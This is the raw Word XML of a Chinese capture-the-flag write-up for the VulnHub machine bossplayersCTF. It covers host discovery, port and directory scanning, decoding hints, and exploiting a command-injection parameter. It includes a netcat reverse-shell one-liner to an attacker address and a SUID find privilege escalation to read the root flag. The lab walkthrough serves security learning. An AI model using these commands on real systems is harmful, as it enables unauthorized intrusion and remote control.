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F12" w14:textId="0EFC0F36" w:rsidR="00487CF7" w:rsidRDefault="001F7231" w:rsidP="001F7231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76E03938" w14:textId="07524B39" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7231">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="0001426F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/bossplayersctf-1,375/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66D6016C" w14:textId="25B8AD84" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>描述有点狠，建议30分钟内拿到root权限，同时不建议使用V</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用V</w:t>
      </w:r>
      <w:r>
        <w:t>irtualBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好点。然而V</w:t>
      </w:r>
      <w:r>
        <w:t>irtualBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有点问题，不是有时候没有I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就是有时候调不了大小。。。。。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E922940" w14:textId="38E56331" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77E543E4" wp14:editId="3A54831D">
            <wp:extent cx="527431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1828" w14:textId="7B216368" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231"/>
    <w:p w14:paraId="4AEF856A" w14:textId="6F7D6DA9" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载好以后用V</w:t>
      </w:r>
      <w:r>
        <w:t>irtualBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开，网卡调成桥接模式运行就行了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4DA3D" w14:textId="2C63CF1C" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="331C74B1" wp14:editId="70D81328">
            <wp:extent cx="5080261" cy="381019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21A4" w14:textId="4F180C5F" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231"/>
    <w:p w14:paraId="689F7559" w14:textId="24AF2D16" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231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6F6176BD" w14:textId="3BD6FD31" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这次由于不会开机就回显I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以只能用n</w:t>
      </w:r>
      <w:r>
        <w:t>etdiscover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测一波,这次直接找P</w:t>
      </w:r>
      <w:r>
        <w:t>CS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的，可以直接确认靶机I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为192</w:t>
      </w:r>
      <w:r>
        <w:t>.168.3.194</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784CB9AB" w14:textId="74BEAC27" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>netdiscover -r 192.168.3.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF42D6" w14:textId="41BC25CE" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="524633E6" wp14:editId="7BCC8FAD">
            <wp:extent cx="4343623" cy="1390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23FA" w14:textId="3F0DFFE5" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231"/>
    <w:p w14:paraId="171EB947" w14:textId="2A62D09F" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后开始用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>amp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测波端口,这次只开了22和80端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACF13E7" w14:textId="6F8BDC29" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>nmap -A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-v -p- 192.168.3.194</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A0302" w14:textId="67F86D6A" w:rsidR="001F7231" w:rsidRDefault="001F7231" w:rsidP="001F7231">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B119CDB" wp14:editId="3C41DA1C">
            <wp:extent cx="3721291" cy="2140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6203" w14:textId="17DED327" w:rsidR="00CC0898" w:rsidRDefault="00CC0898" w:rsidP="001F7231"/>
    <w:p w14:paraId="5A572C46" w14:textId="5D4A609B" w:rsidR="00CC0898" w:rsidRDefault="00CC0898" w:rsidP="001F7231"/>
    <w:p w14:paraId="0968F8B9" w14:textId="1A2C7513" w:rsidR="00CC0898" w:rsidRDefault="00CC0898" w:rsidP="00CC0898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36942641" w14:textId="37E27B25" w:rsidR="00CC0898" w:rsidRDefault="00E55D9B" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>irb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挖掘信息，这里可以挖到一个/</w:t>
      </w:r>
      <w:r>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B00F4" w14:textId="2FF0DB6E" w:rsidR="00E55D9B" w:rsidRDefault="00E55D9B" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637C0CB1" wp14:editId="77B32DCC">
            <wp:extent cx="3473629" cy="21146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93A" w14:textId="7E85FD44" w:rsidR="00E55D9B" w:rsidRDefault="00E55D9B" w:rsidP="00CC0898"/>
    <w:p w14:paraId="75522537" w14:textId="4E99AAA5" w:rsidR="00E55D9B" w:rsidRDefault="00E55D9B" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问一下提示是超级密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78346896" w14:textId="2978BD6B" w:rsidR="00E55D9B" w:rsidRDefault="00E55D9B" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61E4AB45" wp14:editId="138326EB">
            <wp:extent cx="3441877" cy="86364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69E" w14:textId="59FE7085" w:rsidR="00E55D9B" w:rsidRDefault="00E55D9B" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解码了以后是个提示，继续努力。。。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C298C1" w14:textId="112F91A2" w:rsidR="00E55D9B" w:rsidRDefault="00E55D9B" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="131B66FA" wp14:editId="417D6B5F">
            <wp:extent cx="5274310" cy="252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BC3B" w14:textId="1D8C6E3A" w:rsidR="00E55D9B" w:rsidRDefault="00E55D9B" w:rsidP="00CC0898"/>
    <w:p w14:paraId="2F6D78AB" w14:textId="430693BC" w:rsidR="00E55D9B" w:rsidRDefault="00E55D9B" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后返回192</w:t>
      </w:r>
      <w:r>
        <w:t>.168.3.194</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开F</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候发现下面有行编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5E620B" w14:textId="6F46016A" w:rsidR="00E55D9B" w:rsidRDefault="00E55D9B" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73091703" wp14:editId="51DFE55C">
            <wp:extent cx="5274310" cy="3234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C3B" w14:textId="6908B9C9" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="00CC0898">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECC3282" w14:textId="34142E8D" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后拿去在线网站解密解了3次最后得到一个类似网站的提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060EF47D" w14:textId="054A9D96" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51DC5E7B" wp14:editId="4AE0AE35">
            <wp:extent cx="5274310" cy="1295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347F" w14:textId="772F33FD" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="00CC0898"/>
    <w:p w14:paraId="68EA58AF" w14:textId="3E506AEB" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="00CC0898">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试输入/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>workinginprogress.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回页面正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67160522" w14:textId="059352C7" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="00CC08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760C82" wp14:editId="6E66BC0B">
            <wp:extent cx="5274310" cy="2277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B6B1" w14:textId="404C9536" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="007558BF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利用命令执行漏洞加入一句话反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550517B3" w14:textId="25D6EF3D" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="007558BF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为有个t</w:t>
      </w:r>
      <w:r>
        <w:t>est ping command,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以猜测可能存在命令执行漏洞，测试了波?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami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可以成功执行，石锤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32346C5F" w14:textId="6D1055AB" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="007558BF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0269E2ED" wp14:editId="0860D335">
            <wp:extent cx="5099312" cy="2946551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DBB" w14:textId="41A4CD2E" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="007558BF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="550F54D8" wp14:editId="0F20DB8B">
            <wp:extent cx="5274310" cy="2763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2544" w14:textId="4E0E1DC7" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="007558BF"/>
    <w:p w14:paraId="0E99295F" w14:textId="6DACB969" w:rsidR="007558BF" w:rsidRDefault="007558BF" w:rsidP="007558BF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后就是尝试加入一句话反弹shell，记得提前开启</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>etcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003464E6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003464E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功反弹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1651ED3B" w14:textId="5582E8A0" w:rsidR="003464E6" w:rsidRDefault="003464E6" w:rsidP="007558BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话:</w:t>
      </w:r>
      <w:r w:rsidRPr="003464E6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003464E6">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003464E6">
        <w:t xml:space="preserve"> -e /bin/bash 192.168.3.193 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591EA582" w14:textId="1A231466" w:rsidR="003464E6" w:rsidRDefault="003464E6" w:rsidP="007558BF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="030EE7B2" wp14:editId="5B40DA70">
            <wp:extent cx="5274310" cy="1645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5177" w14:textId="00F2B6FF" w:rsidR="003464E6" w:rsidRDefault="003464E6" w:rsidP="007558BF"/>
    <w:p w14:paraId="7A630DA7" w14:textId="3F968734" w:rsidR="003464E6" w:rsidRDefault="003464E6" w:rsidP="003464E6">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>04:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0464EC20" w14:textId="42DD7DF6" w:rsidR="003464E6" w:rsidRDefault="003464E6" w:rsidP="003464E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先使用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-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看看有没有特殊权限，然后只能用f</w:t>
      </w:r>
      <w:r>
        <w:t>ind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到一波 find，可以直接find提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D8D9C" w14:textId="46360DC6" w:rsidR="003464E6" w:rsidRDefault="003464E6" w:rsidP="003464E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61A6ACFC" wp14:editId="11D5C0E4">
            <wp:extent cx="4210266" cy="20067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42BE" w14:textId="63E06716" w:rsidR="003464E6" w:rsidRDefault="003464E6" w:rsidP="003464E6"/>
    <w:p w14:paraId="32DF976D" w14:textId="3E4E5573" w:rsidR="003464E6" w:rsidRDefault="003464E6" w:rsidP="003464E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于f</w:t>
      </w:r>
      <w:r>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权可以</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考这篇文章</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00482CD5" w:rsidRPr="0001426F">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/nul1/p/11309287.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B5D1D10" w14:textId="46D1CAC9" w:rsidR="00482CD5" w:rsidRDefault="00482CD5" w:rsidP="003464E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FBB85E3" wp14:editId="01D0EAF1">
            <wp:extent cx="5131064" cy="11303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5371" w14:textId="6F77B8CE" w:rsidR="00482CD5" w:rsidRDefault="00482CD5" w:rsidP="003464E6"/>
    <w:p w14:paraId="5EF9B517" w14:textId="6B41F4F4" w:rsidR="00482CD5" w:rsidRDefault="00482CD5" w:rsidP="003464E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换个目录然后创建文件就可以了执行了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A2E873" w14:textId="5C5F2661" w:rsidR="00482CD5" w:rsidRDefault="00482CD5" w:rsidP="003464E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0356E711" wp14:editId="5565681B">
            <wp:extent cx="2857647" cy="520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D40" w14:textId="0747BEC6" w:rsidR="00482CD5" w:rsidRDefault="00482CD5" w:rsidP="003464E6"/>
    <w:p w14:paraId="666E5957" w14:textId="785BC23D" w:rsidR="00482CD5" w:rsidRDefault="00482CD5" w:rsidP="003464E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后再后面换成c</w:t>
      </w:r>
      <w:r>
        <w:t>at /root/root.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功读取flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73378A6E" w14:textId="4315FE59" w:rsidR="00482CD5" w:rsidRPr="00482CD5" w:rsidRDefault="00482CD5" w:rsidP="00346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CB81C9" wp14:editId="74F179E3">
            <wp:extent cx="3645087" cy="41277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D5" w:rsidRPr="0048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D4212" w14:textId="77777777" w:rsidR="00BB4B81" w:rsidRDefault="00BB4B81" w:rsidP="001F7231">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="51DE1562" w14:textId="77777777" w:rsidR="00BB4B81" w:rsidRDefault="00BB4B81" w:rsidP="001F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ED176" w14:textId="77777777" w:rsidR="00BB4B81" w:rsidRDefault="00BB4B81" w:rsidP="001F7231">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0F6AD3F7" w14:textId="77777777" w:rsidR="00BB4B81" w:rsidRDefault="00BB4B81" w:rsidP="001F7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D"/>
    <w:rsid w:val="001F7231"/>
    <w:rsid w:val="003464E6"/>
    <w:rsid w:val="00482CD5"/>
    <w:rsid w:val="00487CF7"/>
    <w:rsid w:val="007558BF"/>
    <w:rsid w:val="0094605D"/>
    <w:rsid w:val="00BB4B81"/>
    <w:rsid w:val="00CC0898"/>
    <w:rsid w:val="00E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2F2B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{53A7BCCA-F7DE-43C7-8D8F-8AF23C73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2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23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F72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7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nul1/p/11309287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bossplayersctf-1,375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2020-08-17T01:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-17T02:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>